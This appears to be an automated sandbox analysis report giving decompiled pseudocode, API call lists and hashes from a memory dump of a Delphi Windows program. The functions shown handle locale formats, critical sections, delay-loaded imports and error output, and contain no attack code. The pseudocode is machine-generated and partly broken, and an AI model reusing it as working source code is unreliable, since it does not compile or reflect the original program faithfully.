                                                            • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                            • API String ID: 74573329-1403180336
                                                            • Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                            • Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
                                                            • Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                            • Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				char _v44;
                                                            				char _v48;
                                                            				char _v52;
                                                            				char _v56;
                                                            				char _v60;
                                                            				int _t55;
                                                            				void* _t121;
                                                            				void* _t128;
                                                            				void* _t151;
                                                            				void* _t152;
                                                            				intOrPtr _t172;
                                                            				intOrPtr _t204;
                                                            				signed short _t212;
                                                            				int _t214;
                                                            				intOrPtr _t216;
                                                            				intOrPtr _t217;
                                                            				void* _t224;
                                                            
                                                            				_t224 = __fp0;
                                                            				_t211 = __edi;
                                                            				_t216 = _t217;
                                                            				_t152 = 7;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t152 = _t152 - 1;
                                                            				} while (_t152 != 0);
                                                            				_push(__edi);
                                                            				_t151 = __edx;
                                                            				_t214 = __eax;
                                                            				_push(_t216);
                                                            				_push(0x41e391);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t217;
                                                            				_t55 = IsValidLocale(__eax, 1);
                                                            				_t219 = _t55;
                                                            				if(_t55 == 0) {
                                                            					_t214 = GetThreadLocale();
                                                            				}
                                                            				_t172 =  *0x416f50; // 0x416f54
                                                            				E00409D24(_t151 + 0xbc, _t172);
                                                            				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
                                                            				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
                                                            				E0041E55C(_t214, _t151, _t151, _t211, _t214);
                                                            				E0041E034(_t214, 0, 0x14,  &_v20);
                                                            				E00407E00(_t151, _v20);
                                                            				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
                                                            				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
                                                            				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
                                                            				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
                                                            				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
                                                            				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
                                                            				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
                                                            				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
                                                            				_t212 = E0041E080(_t214, 0x2f, 0x1d);
                                                            				 *(_t151 + 6) = _t212;
                                                            				_push(_t212);
                                                            				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
                                                            				E00407E00(_t151 + 0xc, _v36);
                                                            				_push( *(_t151 + 6) & 0x0000ffff);
                                                            				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
                                                            				E00407E00(_t151 + 0x10, _v40);
                                                            				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
                                                            				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
                                                            				E00407E00(_t151 + 0x14, _v44);
                                                            				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
                                                            				E00407E00(_t151 + 0x18, _v48);
                                                            				E00407A20( &_v12);
                                                            				E00407A20( &_v16);
                                                            				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
                                                            				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
                                                            				_t220 = _t121;
                                                            				if(_t121 != 0) {
                                                            					E00407E48( &_v8, 0x41e438);
                                                            				} else {
                                                            					E00407E48( &_v8, 0x41e428);
                                                            				}
                                                            				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
                                                            				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
                                                            				_t221 = _t128;
                                                            				if(_t128 == 0) {
                                                            					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
                                                            					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
                                                            						E00407E48( &_v12, L"AMPM ");
                                                            					} else {
                                                            						E00407E48( &_v16, L" AMPM");
                                                            					}
                                                            				}
                                                            				_push(_v12);
                                                            				_push(_v8);
                                                            				_push(":mm");
                                                            				_push(_v16);
                                                            				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
                                                            				_push(_v12);
                                                            				_push(_v8);
                                                            				_push(L":mm:ss");
                                                            				_push(_v16);
                                                            				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
                                                            				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
                                                            				 *((short*)(_t151 + 0xc4)) = 0x32;
                                                            				_pop(_t204);
                                                            				 *[fs:eax] = _t204;
                                                            				_push(0x41e398);
                                                            				return E00407A80( &_v60, 0xe);
                                                            			}






























                                                            APIs
                                                            • IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
                                                            • GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC
                                                              • Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                              • Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Locale$Info$ThreadValid
                                                            • String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
                                                            • API String ID: 233154393-2808312488
                                                            • Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                            • Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
                                                            • Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                            • Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                            				char _v8;
                                                            				void* _t18;
                                                            				signed short _t28;
                                                            				intOrPtr _t35;
                                                            				intOrPtr* _t44;
                                                            				intOrPtr _t47;
                                                            
                                                            				_t42 = __edi;
                                                            				_push(0);
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_t44 = __edx;
                                                            				_t28 = __eax;
                                                            				_push(_t47);
                                                            				_push(0x40a8e8);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t47;
                                                            				EnterCriticalSection(0x4bdc10);
                                                            				if(_t28 !=  *0x4bdc28) {
                                                            					LeaveCriticalSection(0x4bdc10);
                                                            					E00407A20(_t44);
                                                            					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
                                                            						if( *0x4bdc0c == 0) {
                                                            							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
                                                            							L00403738();
                                                            							if(_t28 != _t18) {
                                                            								if( *_t44 != 0) {
                                                            									_t18 = E004086E4(_t44, E0040A900);
                                                            								}
                                                            								L00403738();
                                                            								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
                                                            								E004086E4(_t44, _v8);
                                                            							}
                                                            						} else {
                                                            							E0040A6C8(_t28, _t44);
                                                            						}
                                                            					}
                                                            					EnterCriticalSection(0x4bdc10);
                                                            					 *0x4bdc28 = _t28;
                                                            					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
                                                            					LeaveCriticalSection(0x4bdc10);
                                                            				} else {
                                                            					E0040858C(_t44, 0x55, 0x4bdc2a);
                                                            					LeaveCriticalSection(0x4bdc10);
                                                            				}
                                                            				_pop(_t35);
                                                            				 *[fs:eax] = _t35;
                                                            				_push(E0040A8EF);
                                                            				return E00407A20( &_v8);
                                                            			}










                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
                                                            • IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
                                                            • EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                            • String ID: en-US,en,
                                                            • API String ID: 975949045-3579323720
                                                            • Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                            • Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
                                                            • Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                            • Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E0042301C(void* __ebx, void* __esi, void* __eflags) {
                                                            				char _v8;
                                                            				void* _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				intOrPtr* _t21;
                                                            				intOrPtr _t61;
                                                            				void* _t68;
                                                            
                                                            				_push(__ebx);
                                                            				_v20 = 0;
                                                            				_v8 = 0;
                                                            				_push(_t68);
                                                            				_push(0x423116);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t68 + 0xfffffff0;
                                                            				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
                                                            				if(_t21 == 0) {
                                                            					if(E0041FF2C() != 2) {
                                                            						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
                                                            							E00422FE8();
                                                            							RegCloseKey(_v12);
                                                            						}
                                                            					} else {
                                                            						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
                                                            							E00422FE8();
                                                            							RegCloseKey(_v12);
                                                            						}
                                                            					}
                                                            					E0040873C( &_v20, _v8, 0x42322c);
                                                            					E00405920(_v20,  &_v16);
                                                            					if(_v16 != 0) {
                                                            					}
                                                            				} else {
                                                            					 *_t21();
                                                            				}
                                                            				_pop(_t61);
                                                            				 *[fs:eax] = _t61;
                                                            				_push(E0042311D);
                                                            				E00407A20( &_v20);
                                                            				return E00407A20( &_v8);
                                                            			}











                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressCloseHandleModuleProc
                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                            • API String ID: 4190037839-2401316094
                                                            • Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                            • Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
                                                            • Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                            • Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                            				long _v8;
                                                            				signed int _v12;
                                                            				long _v16;
                                                            				void* _v20;
                                                            				long _v24;
                                                            				intOrPtr _v28;
                                                            				intOrPtr _v32;
                                                            				intOrPtr _v36;
                                                            				intOrPtr _v40;
                                                            				intOrPtr _v44;
                                                            				struct HINSTANCE__** _v48;
                                                            				CHAR* _v52;
                                                            				void _v56;
                                                            				long _v60;
                                                            				_Unknown_base(*)()* _v64;
                                                            				struct HINSTANCE__* _v68;
                                                            				CHAR* _v72;
                                                            				signed int _v76;
                                                            				CHAR* _v80;
                                                            				intOrPtr* _v84;
                                                            				void* _v88;
                                                            				void _v92;
                                                            				signed int _t104;
                                                            				signed int _t106;
                                                            				signed int _t108;
                                                            				long _t113;
                                                            				intOrPtr* _t119;
                                                            				void* _t124;
                                                            				void _t126;
                                                            				long _t128;
                                                            				struct HINSTANCE__* _t142;
                                                            				long _t166;
                                                            				signed int* _t190;
                                                            				_Unknown_base(*)()* _t191;
                                                            				void* _t194;
                                                            				intOrPtr _t196;
                                                            
                                                            				_push(_a4);
                                                            				memcpy( &_v56, 0x4b7c40, 8 << 2);
                                                            				_pop(_t194);
                                                            				_v56 =  *0x4b7c40;
                                                            				_v52 = E0040D6C8( *0x004B7C44);
                                                            				_v48 = E0040D6D8( *0x004B7C48);
                                                            				_v44 = E0040D6E8( *0x004B7C4C);
                                                            				_v40 = E0040D6F8( *0x004B7C50);
                                                            				_v36 = E0040D6F8( *0x004B7C54);
                                                            				_v32 = E0040D6F8( *0x004B7C58);
                                                            				_v28 =  *0x004B7C5C;
                                                            				memcpy( &_v92, 0x4b7c60, 9 << 2);
                                                            				_t196 = _t194;
                                                            				_v88 = 0x4b7c60;
                                                            				_v84 = _a8;
                                                            				_v80 = _v52;
                                                            				if((_v56 & 0x00000001) == 0) {
                                                            					_t166 =  *0x4b7c84; // 0x0
                                                            					_v8 = _t166;
                                                            					_v8 =  &_v92;
                                                            					RaiseException(0xc06d0057, 0, 1,  &_v8);
                                                            					return 0;
                                                            				}
                                                            				_t104 = _a8 - _v44;
                                                            				_t142 =  *_v48;
                                                            				if(_t104 < 0) {
                                                            					_t104 = _t104 + 3;
                                                            				}
                                                            				_v12 = _t104 >> 2;
                                                            				_t106 = _v12;
                                                            				_t190 = (_t106 << 2) + _v40;
                                                            				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
                                                            				_v76 = _t108;
                                                            				if(_t108 == 0) {
                                                            					_v72 =  *_t190 & 0x0000ffff;
                                                            				} else {
                                                            					_v72 = E0040D708( *_t190) + 2;
                                                            				}
                                                            				_t191 = 0;
                                                            				if( *0x4be640 == 0) {
                                                            					L10:
                                                            					if(_t142 != 0) {
                                                            						L25:
                                                            						_v68 = _t142;
                                                            						if( *0x4be640 != 0) {
                                                            							_t191 =  *0x4be640(2,  &_v92);
                                                            						}
                                                            						if(_t191 != 0) {
                                                            							L36:
                                                            							if(_t191 == 0) {
                                                            								_v60 = GetLastError();
                                                            								if( *0x4be644 != 0) {
                                                            									_t191 =  *0x4be644(4,  &_v92);
                                                            								}
                                                            								if(_t191 == 0) {
                                                            									_t113 =  *0x4b7c8c; // 0x0
                                                            									_v24 = _t113;
                                                            									_v24 =  &_v92;
                                                            									RaiseException(0xc06d007f, 0, 1,  &_v24);
                                                            									_t191 = _v64;
                                                            								}
                                                            							}
                                                            							goto L41;
                                                            						} else {
                                                            							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
                                                            								L35:
                                                            								_t191 = GetProcAddress(_t142, _v72);
                                                            								goto L36;
                                                            							} else {
                                                            								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
                                                            								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
                                                            									goto L35;
                                                            								} else {
                                                            									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
                                                            									if(_t191 == 0) {
                                                            										goto L35;
                                                            									}
                                                            									L41:
                                                            									 *_a8 = _t191;
                                                            									goto L42;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					if( *0x4be640 != 0) {
                                                            						_t142 =  *0x4be640(1,  &_v92);
                                                            					}
                                                            					if(_t142 == 0) {
                                                            						_t142 = LoadLibraryA(_v80);
                                                            					}
                                                            					if(_t142 != 0) {
                                                            						L20:
                                                            						if(_t142 == E0040CBA0(_v48, _t142)) {
                                                            							FreeLibrary(_t142);
                                                            						} else {
                                                            							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
                                                            								_t124 = LocalAlloc(0x40, 8);
                                                            								_v20 = _t124;
                                                            								if(_t124 != 0) {
                                                            									 *((intOrPtr*)(_v20 + 4)) = _t196;
                                                            									_t126 =  *0x4b7c3c; // 0x0
                                                            									 *_v20 = _t126;
                                                            									 *0x4b7c3c = _v20;
                                                            								}
                                                            							}
                                                            						}
                                                            						goto L25;
                                                            					} else {
                                                            						_v60 = GetLastError();
                                                            						if( *0x4be644 != 0) {
                                                            							_t142 =  *0x4be644(3,  &_v92);
                                                            						}
                                                            						if(_t142 != 0) {
                                                            							goto L20;
                                                            						} else {
                                                            							_t128 =  *0x4b7c88; // 0x0
                                                            							_v16 = _t128;
                                                            							_v16 =  &_v92;
                                                            							RaiseException(0xc06d007e, 0, 1,  &_v16);
                                                            							return _v64;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					_t191 =  *0x4be640(0,  &_v92);
                                                            					if(_t191 == 0) {
                                                            						goto L10;
                                                            					} else {
                                                            						L42:
                                                            						if( *0x4be640 != 0) {
                                                            							_v60 = 0;
                                                            							_v68 = _t142;
                                                            							_v64 = _t191;
                                                            							 *0x4be640(5,  &_v92);
                                                            						}
                                                            						return _t191;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0040D2D0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                            • Instruction ID: 6bdc8742f8c12d3c05e6aa795b4e0fa0c425ed74332de7fca684440f38d882f1
                                                            • Opcode Fuzzy Hash: 4fdbadfbff537c598349848257c7330453a14fb024132e1a583ffc8385a63ee1
                                                            • Instruction Fuzzy Hash: 7CA16F75D002089FDB14DFE9D881BAEB7B5BB88300F14423AE505B73C1DB78A949CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 72%
                                                            			E004047B0(int __eax, void* __ecx, void* __edx) {
                                                            				long _v12;
                                                            				int _t4;
                                                            				long _t7;
                                                            				void* _t11;
                                                            				long _t12;
                                                            				void* _t13;
                                                            				long _t18;
                                                            
                                                            				_t4 = __eax;
                                                            				_t24 = __edx;
                                                            				_t20 = __eax;
                                                            				if( *0x4bb058 == 0) {
                                                            					_push(0x2010);
                                                            					_push(__edx);
                                                            					_push(__eax);
                                                            					_push(0);
                                                            					L00403780();
                                                            				} else {
                                                            					_t7 = E00407EF0(__edx);
                                                            					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
                                                            					_t11 =  *0x4b7078; // 0x403920
                                                            					_t12 = E00407EF0(_t11);
                                                            					_t13 =  *0x4b7078; // 0x403920
                                                            					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
                                                            					_t18 = E00407EF0(_t20);
                                                            					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
                                                            				}
                                                            				return _t4;
                                                            			}

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D2
                                                            • WriteFile.KERNEL32(00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047D8
                                                            • GetStdHandle.KERNEL32(000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047F7
                                                            • WriteFile.KERNEL32(00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?,00000000,?,?,00000000,0040515B), ref: 004047FD
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000,?), ref: 00404814
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,00403920,00000000,?,00000000,00000000,000000F4,00403924,00000000), ref: 0040481A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: 9@
                                                            • API String ID: 3320372497-3209974744
                                                            • Opcode ID: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                            • Instruction ID: 9b3b4e35e49a927b8991458b20a1a8ec0ccf5b925403b1971dfbe1b0899ab5f0
                                                            • Opcode Fuzzy Hash: 5f8d133322f34133c732956f1222a9d0eafcb790ac979970e9ef56a2ae19cd1b
                                                            • Instruction Fuzzy Hash: 2001AEE25492103DE110F7A69C85F57168C8B4472AF10467F7218F35D2C9395D44927E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 62%
                                                            			E0041F0F4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                            				char* _v8;
                                                            				long _v12;
                                                            				short _v140;
                                                            				short _v2188;
                                                            				void* _t15;
                                                            				char* _t17;
                                                            				intOrPtr _t19;
                                                            				intOrPtr _t30;
                                                            				long _t48;
                                                            				intOrPtr _t56;
                                                            				intOrPtr _t57;
                                                            				int _t61;
                                                            				void* _t64;
                                                            
                                                            				_push(__ebx);
                                                            				_push(__esi);
                                                            				_v8 = 0;
                                                            				_push(_t64);
                                                            				_push(0x41f219);
                                                            				_push( *[fs:ecx]);
                                                            				 *[fs:ecx] = _t64 + 0xfffff778;
                                                            				_t61 = E0041EEFC(_t15, __ebx,  &_v2188, __edx, __edi, __esi, 0x400);
                                                            				_t17 =  *0x4ba6c0; // 0x4bb058
                                                            				if( *_t17 == 0) {
                                                            					_t19 =  *0x4ba4f8; // 0x40e710
                                                            					_t11 = _t19 + 4; // 0xffed
                                                            					LoadStringW(E00409FF0( *0x4be634),  *_t11,  &_v140, 0x40);
                                                            					MessageBoxW(0,  &_v2188,  &_v140, 0x2010);
                                                            				} else {
                                                            					_t30 =  *0x4ba524; // 0x4bb340
                                                            					E00405564(E00405820(_t30));
                                                            					_t48 = WideCharToMultiByte(1, 0,  &_v2188, _t61, 0, 0, 0, 0);
                                                            					_push(_t48);
                                                            					E00409C00();
                                                            					WideCharToMultiByte(1, 0,  &_v2188, _t61, _v8, _t48, 0, 0);
                                                            					WriteFile(GetStdHandle(0xfffffff4), _v8, _t48,  &_v12, 0);
                                                            					WriteFile(GetStdHandle(0xfffffff4), 0x41f234, 2,  &_v12, 0);
                                                            				}
                                                            				_pop(_t56);
                                                            				 *[fs:eax] = _t56;
                                                            				_push(0x41f220);
                                                            				_t57 =  *0x41f0c4; // 0x41f0c8
                                                            				return E00409D24( &_v8, _t57);
                                                            			}

                                                            APIs
                                                              • Part of subcall function 0041EEFC: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
                                                              • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
                                                              • Part of subcall function 0041EEFC: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
                                                              • Part of subcall function 0041EEFC: LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0041F219), ref: 0041F155
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F188
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F19A
                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0041F1A0
                                                            • GetStdHandle.KERNEL32(000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041F1B4
                                                            • WriteFile.KERNEL32(00000000,000000F4,0041F234,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0041F1BA
                                                            • LoadStringW.USER32(00000000,0000FFED,?,00000040), ref: 0041F1DE
                                                            • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0041F1F8
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp
